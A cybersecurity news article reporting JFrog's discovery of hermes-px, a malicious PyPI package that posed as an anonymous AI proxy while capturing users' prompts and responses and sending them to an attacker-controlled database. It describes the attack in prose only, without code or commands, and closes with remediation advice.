A sophisticated supply chain attack has been uncovered in the Python ecosystem, where a malicious package named hermes-px was used to secretly steal sensitive data from developers. Discovered by JFrog, the package was distributed via PyPI and disguised as a secure AI proxy tool, making it particularly dangerous for developers working with AI applications.
At first glance, hermes-px appeared legitimate. It promised anonymous AI inference by routing requests through Tor and mimicked the interface of popular AI SDKs. With polished documentation, working examples, and even advanced features like retrieval-augmented generation (RAG), the package was carefully designed to build trust. It even presented itself as a product from a fake company, creating the illusion of a credible solution for developers seeking free AI access without API keys.
However, beneath this convincing façade, the package was actively exploiting users. It secretly hijacked a private university’s AI endpoint and embedded a stolen system prompt from Anthropic’s Claude model. While the attackers attempted to rebrand the prompt, traces of its original source remained, confirming its origin. This misuse of proprietary AI infrastructure added another layer of ethical and security concerns.
The most alarming aspect of the attack was its data exfiltration mechanism. Every prompt sent by users—along with the AI-generated responses was quietly captured and transmitted to an attacker-controlled database. Despite claiming to route traffic through Tor for anonymity, the package bypassed this layer for telemetry, exposing users’ real IP addresses. This contradiction made the tool not only deceptive but also highly invasive.
To further evade detection, the attackers used multi-layered encryption techniques to hide critical strings such as database credentials and endpoints. Additionally, the package instructed users to execute remote Python code from an external source, allowing attackers to update their payload dynamically. This ensured the malware could evolve even after initial deployment.
This incident highlights a growing trend in software supply chain attacks, where threat actors invest significant effort into making malicious packages appear trustworthy. By targeting developers—who often integrate such tools directly into production environments—attackers can gain access to valuable data and systems at scale.
Security experts strongly advise anyone who installed the package to remove it immediately, rotate all credentials, and treat any exposed data as compromised. More broadly, this case serves as a reminder that even well-documented and seemingly professional tools can hide serious threats, reinforcing the need for strict dependency vetting and runtime monitoring.
Recommended Cyber Technology News :
- Beaten Zone Secures AUD 17M Defence Fundraise
- Bridge Data Centres Replaces Tenant Amid Nvidia Chip Probe
- ZeroFox Highlights AI-Driven Threat Intelligence
To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com
